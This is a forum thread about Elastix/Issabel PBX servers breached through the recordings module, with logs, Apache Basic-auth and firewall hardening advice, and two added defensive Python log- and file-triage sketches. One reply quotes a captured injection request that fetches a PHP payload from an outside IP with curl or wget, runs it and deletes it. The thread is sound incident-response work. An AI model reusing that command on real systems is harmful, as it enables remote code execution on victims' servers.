      Jun 9 22:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 22:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:15:36 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper hdmodelreport
      Jun 9 23:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
      Jun 9 23:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus

        striderec

        I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

        I delete them over and over but they come back...

        I see strange POST commands on the access and ssl_access logs which I have already shared with you..

        Now try to find a script writing to those directories

          Hello, sorry for my English,
          Hello, I usually protect all servers with htaccess to at least prevent just anyone from accessing the web part. I am copying what has to be done so that it asks for a username and password when accessing Issabel (or the old Elastix). I put it in Spanish because I do not know English well, but I hope you understand.

          You give your clients the username and password, and with that only those who know them can access via the web.

          I hope it helps

          In the configuration file at

          vi /etc/httpd/conf.d/elastix.conf

          in the elastix.conf file

          you have to put something like this

          # Apache-level configuration for Elastix administration interface

          Timeout 300

          # Default apache configuration specifies greater limits than these

          #MaxClients 150
          #MaxRequestsPerChild 1000

          # Default apache User and Group directives MUST be commented out
          # in order for these to take effect.

          User asterisk
          Group asterisk

          # this asks for a username and password when entering via the web, for more security

          <Directory "/var/www/html">

          # Redirect administration interface to https

          RewriteEngine On
          RewriteCond %{HTTPS} off
          RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
          AuthType Basic
          AuthName "Zona Restringida voip"
          AuthUserFile /usr/local/apache/wwwpasswd
          Require user clientes
          </Directory>

          then save it and run

          to create the directory and the users for the requested password; for example, for clientes, which is the user, it would be

          The next step is to generate the password with the command

          mkdir /usr/local/apache
          htpasswd -c /usr/local/apache/wwwpasswd clientes

          It will then ask you to enter a password. Once these steps are finished, Apache must be restarted for the changes to take effect

          service httpd restart

          and that's it; with this it will ask for a username and password on port 443

            Hello hgmnetwork,
            Thanks for the workaround.

            Is it useful for this problem to remove ARI?

              To remove it if it is infected, no; but it should not happen again once cleaned, since it blocks http access for requests without a password

              Sorry for my English

                hgmnetwork Thank you for your advice, I did what you suggested but the same thing happened nonetheless. It looks like there is a script already on the server that is running and doing this, but I can't determine where it is yet.

                Paul

                  striderec According to your logs, the recordings module is the one that is compromised. Through that module they are downloading the scripts that you can see in the URL:

                  POST%20%2Frecordings%2Fmisc%2F%3Fcmd%3Did%3Buname%20-a%3Bcurl%20-ks%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%20%7C%7C%20wget%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20-O%20%2Ftmp%2Fa.out%20%7C%7C%20GET%20%20http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt%20%3E%20%2Ftmp%2Fa.out%3Bphp%20%2Ftmp%2Fa.out%3Brm%20%2Ftmp%2Fa.out

                  It translates to:

                  POST /recordings/misc/?cmd=id;uname -a;curl -ks http://51.15.12.13/t/cmd.txt > /tmp/a.out || wget http://51.15.12.13/t/cmd.txt -O /tmp/a.out || GET  http://51.15.12.13/t/cmd.txt > /tmp/a.out;php /tmp/a.out;rm /tmp/a.out

                  Start by banning all traffic to the IP 51.15.12.13; you can see the encoded txt file even in the browser.

                  Check whether there is an update for the recordings module, or simply disable it.
                  The server is hosted in France and has abuse reports against PBXs:
                  https://www.abuseipdb.com/check/51.15.12.13
                  And here is contact information:
                  https://hostingcompass.com/whois/51.15.12.13

                  In case you feel like doing spam or DDoS :)

                  The strange thing, if you already have access blocked with htaccess, is that it can do it again through GET or POST over the web; I imagine you still have some script or file planted. In theory, once you remove everything infected, with htaccess it should not happen to you again, at least if the attack is via the web (for example, if they try to do a GET or POST to any page they will not be able to unless they have the htaccess username and password).

                  As soon as you remove everything problematic inside the server, it should not get infected again.

                  Another way to look for possible suspicious files is to search for any file whose last access was, for example, today or yesterday or day X when you know they got in; you may still get many results, but it will narrow the search

                    navaismo Thanks! That is exactly what I am doing now, although it is that IP in question and others too. Actually, I just realized that putting a password on http as hgmnetwork suggested is working; what happened is that I forgot a step on one of the affected servers, since this is the ssl_access log of a server they tried to get into but could not:

                    89.249.67.50 - - [13/Jun/2017:05:31:39 -0400] "GET / HTTP/1.1" 401 381
                    213.202.233.77 - - [13/Jun/2017:05:31:39 -0400] "GET /recordings/misc/salem.php HTTP/1.1" 403 227
                    89.249.67.50 - - [13/Jun/2017:05:44:35 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:05:58:07 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:11:47 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:23:10 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:34:36 -0400] "GET / HTTP/1.1" 401 381
                    163.172.68.183 - - [13/Jun/2017:06:34:41 -0400] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 401 381
                    216.218.206.68 - - [13/Jun/2017:06:45:01 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:45:38 -0400] "GET / HTTP/1.1" 401 381
                    216.218.206.68 - - [13/Jun/2017:06:45:46 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:06:56:28 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:08:26 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:19:34 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:31:06 -0400] "GET / HTTP/1.1" 401 381
                    89.249.67.50 - - [13/Jun/2017:07:55:53 -0400] "GET / HTTP/1.1" 401 381

                    As you can see, the intruders get error 401, which is UNAUTHORIZED, and 403 (FORBIDDEN); they cannot do anything. It is a nuisance to have to enter two passwords (the Apache server's and Elastix / Issabel's own), but it is something clients will understand when they are told it is to keep intruders out of the system.

                    Additionally, everything seems to indicate that it is through the recordings scripts that Elastix is being breached, as you indicated.
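The two log checks discussed above (percent-decoding a request to expose an injected command, and reading the 401/403 status to see whether the Basic-auth layer stopped it), as an added example that is not part of any post in the thread. The sample lines are constructed with documentation IP addresses, and the metacharacter list is a heuristic chosen for this sketch.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache common/combined log prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
# Shell metacharacters that rarely belong in a web parameter value (heuristic).
SHELL_META = re.compile(r'[;|`]|\$\(|&&|>\s*/')

# Constructed sample lines, modelled on the log formats shown in the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Jun/2017:05:31:39 -0400] "GET / HTTP/1.1" 401 381
203.0.113.5 - - [09/Jun/2017:01:41:29 -0400] "POST /recordings/misc/?cmd=id%3Buname%20-a HTTP/1.1" 200 512 "-" "-"
203.0.113.5 - - [13/Jun/2017:01:41:30 -0400] "POST /recordings/misc/?cmd=id%253Buname%2520-a HTTP/1.1" 401 381
192.0.2.10 - - [09/Jun/2017:02:00:00 -0400] "GET /index.php?menu=pbxconfig&page=1 HTTP/1.1" 200 9000
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is exposed too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def outcome(status):
    """Map the HTTP status to what the server did with the request."""
    if status in (401, 403):
        return "denied"       # stopped by Basic auth or an access rule
    if 200 <= status < 300:
        return "served"       # the request reached the application
    if 300 <= status < 400:
        return "redirected"   # e.g. the http -> https rewrite
    return "other"


def triage(lines):
    """Return one finding per query parameter whose decoded value looks like shell."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        parts = m["request"].split(" ")
        if len(parts) < 2:
            continue
        try:
            query = urlsplit(parts[1]).query
        except ValueError:      # malformed request target
            continue
        status = int(m["status"])
        # Split on '&' before decoding so an encoded '&' stays inside its value.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = decode_fully(raw.replace("+", " "))
            if SHELL_META.search(value):
                findings.append({
                    "ip": m["ip"],
                    "time": m["ts"],
                    "method": parts[0],
                    "path": urlsplit(parts[1]).path,
                    "param": name,
                    "decoded": value,
                    "status": status,
                    "outcome": outcome(status),
                })
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print("{outcome:10} {status} {ip:15} {method} {path} {param}={decoded!r}".format(**hit))
```

A "served" finding is the one to investigate first; "denied" findings show the extra authentication layer doing its job.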

                    striderec Actually, you should not have the ports open to the WAN. That is where the problem begins. Your design should follow these questions:
                    -- Do you really need to open ports?
                    -- If you have to open ports, it is done only for known IPs.
                    -- If the IPs are dynamic, a VPN solves the problem.

                    It is a basic rule never to open ports to the WAN without a filter or without a VPN, precisely because of what has happened to you. The best thing is to reinstall the PBX, since you have not been able to identify whether there is a script on the server.

                      navaismo I generally only open the PBX to my own IPs (office, home, the client's fixed IPs if they have them); I have the anti-hacker module and the firewall active to prevent this, but as we all know hackers always manage to figure out how to get in.

                      The VPN is a good idea, but unfortunately it only works for "on-site" (local) installations, which in the particular case of my business I hardly have any more, since most of my clients like the idea of having something hosted outside their office or in the cloud, and 95% of my clientele has Elastix virtualized with VMWare ESXi 6.5 from my data center, so the VPN is not an adequate solution for one simple reason: all my clients are remote extensions and, with honorable exceptions, not all IP phones have a VPN client built into their firmware to connect them that way to my data center network.

                      striderec Note that, according to the logs, they are running a basic dictionary attack against you to get in (all the POSTs to / ). Putting .htaccess in place will make it more complicated for them (perhaps the script kiddies do not use basic http auth and only automate the POSTs)... or else they will have two passwords to guess.

                      ARI is a known attack vector; I am not sure whether the version included in Issabel 4 has the vulnerabilities in callme.php and similar files that appear to have been the attack vectors in your case... it is possible that this is resolved, but I cannot guarantee it.

                      ARI is one of the first candidates to be removed, after a2billing, which was already removed from the ISO. Unless there are users who can contribute the appropriate security patches, what we will possibly decide is to withdraw the functionality (developed by third parties), or to force .htaccess authentication layers. But the ideal in the medium term would be to replace it with our own, more modern tools, as with FreePBX.

                      It would be good to put together a "security" team that can do testing and pen testing, or that can try to use all the known exploits on a fresh installation.

                      Regards,

                      asternic Nicolás, I applied what hgmnetwork indicated and at least so far the potential attackers are receiving HTTP 401 and 403 errors, which is positive so far. I will still be monitoring my affected servers all day to find out whether they are finally cut short in their attempts to get in and damage FreePBX GUI access.

                      What worries me is that http and https are blocked in the firewall for IPs other than mine and the clients' fixed ones, but I still see attempts to access the PBX through those ports, which leaves me wondering whether something in the Elastix firewall is not working properly or whether it is not applying the rules in the correct order.

                      My understanding is that priority goes from higher number to lower number, which means for example that rule #12 is applied before rule #8 and therefore whatever rule #8 "allows" comes after what I have "blocked" in rule #12. Example: in rule #12, according to the Elastix firewall, I have blocked http for everyone, and in rule #8 I unblock http for 127.0.0.1 and in #9 I unblock http for my office's fixed IP. If I understand this logic correctly, this should allow the IPs in rules #8 and #9 through to the http port but nobody else. Correct me if I am wrong?

                      I have always liked contributing with reports of system bugs or problems of any kind. It helps a lot that I sell virtualized Elastix together with DIDs and local or international call minutes for offices and call centers. Day by day I am monitoring my servers to keep an eye out for any attack or problem there may be and report it.

                        asternic and by the way, these attacks were also carried out on clean, brand-new out-of-the-box Elastix 4.0 installations, which are supposed to have CentOS 7 and not 5.11, which is already discontinued. That is, the script exploit is present even in the "most recent" version of the old Elastix.

                        striderec Everything you can report is more than welcome. Regarding the firewall rules, the only thing I can suggest is that you look at them on the console, not through the web:

                        iptables -vnL

                        And there you will be able to verify their order. Elastix 4 has many bugs due to the introduction of CentOS 7, including one where it DOES NOT INITIALIZE the firewall even though the GUI says it does. And the GUI never checks whether the firewall (iptables) is running or not.

                        The command above will show you whether or not there are rules created.

                        Issabel 4 has changed a lot from what Elastix 4 was:

                        FreePBX was forked to IssabelPBX at its version 2.11.43 (that version fixes many of the FreePBX exploits).
                        We have fixed the previously mentioned firewall bug, and the GUI also shows the real status.

                        We have verified that there are unreported/unknown exploits in A2Billing, so we have removed it from the .iso and will soon remove it from the repositories as a preventive measure.

                        It is possible that other exploits exist in FreePBX (now IssabelPBX), or in the code that came from Elastix, and we are working proactively to resolve/minimize incidents.

                        Next week we will announce the stable version of Issabel 4, and we will then ask that you migrate at least one of your systems (if you have the time and inclination, you can do it with our development version this very week), to then monitor this new system and see whether it is attacked and exploited.

                        If you want to experiment with the Issabel 4 ISO, tell me privately and I will send you a link so you can try it.

                        Regards,

                        I was suffering the same attack; every day at 00:22 several files were deleted. I mitigated it with a script that restores the affected files from an earlier backup. I also blocked all the https traffic that had been left exposed to the public by mistake, and I deleted the magnito.php file, which was only found in the _asterisk directory, curiously with a date of October 2015, which is when the PBX was installed. For now I have had no problems for a week, and just in case I also deleted the /usr/src/a2billing directory.
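On searching for suspicious files by date, as suggested earlier in the thread: a file whose modification time shows an old date, like the October 2015 date reported above, is skipped by a modification-time search for the incident day. The added example below (not code from any poster) filters on the inode change time instead, which on Linux the kernel updates on every write, chmod or rename and which cannot be set with `touch`; the file name, function names and one-hour window are assumptions of this sketch.

```python
import os
import tempfile
import time


def changed_since(root, since_epoch, suffixes=(".php",)):
    """List files under root whose inode change time (ctime) is >= since_epoch.

    'missed_by_mtime' is True when the file's modification time is older than
    the window, i.e. a search by mtime for the same window would not list it.
    On Linux st_ctime is the inode change time; on Windows it is creation time.
    """
    rows = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if suffixes and not name.lower().endswith(tuple(suffixes)):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks out of root
            except OSError:
                continue              # file vanished or is unreadable
            if st.st_ctime >= since_epoch:
                rows.append({
                    "path": path,
                    "mtime": st.st_mtime,
                    "ctime": st.st_ctime,
                    "missed_by_mtime": st.st_mtime < since_epoch,
                })
    return sorted(rows, key=lambda r: r["ctime"])


def demo():
    """Constructed tree: one placeholder PHP file with its mtime set to 2015-10-01."""
    with tempfile.TemporaryDirectory() as root:
        dropped = os.path.join(root, "dropped.php")
        with open(dropped, "w") as fh:
            fh.write("<?php /* constructed placeholder */ ?>")
        backdated = 1443657600        # 2015-10-01 00:00:00 UTC
        os.utime(dropped, (backdated, backdated))

        window_start = time.time() - 3600   # "the last hour" as incident window
        # What a modification-time search for the window would return.
        by_mtime = [p for p in (dropped,) if os.stat(p).st_mtime >= window_start]
        # What the change-time search returns for the same window.
        by_ctime = [
            (os.path.basename(r["path"]), r["missed_by_mtime"])
            for r in changed_since(root, window_start)
        ]
        return by_mtime, by_ctime


if __name__ == "__main__":
    by_mtime, by_ctime = demo()
    print("found by mtime:", by_mtime)
    print("found by ctime:", by_ctime)
```

Package installs and permission changes also update ctime, so expect legitimate files in the result on a recently updated system; compare the list against a known-good backup or the package manager's file verification.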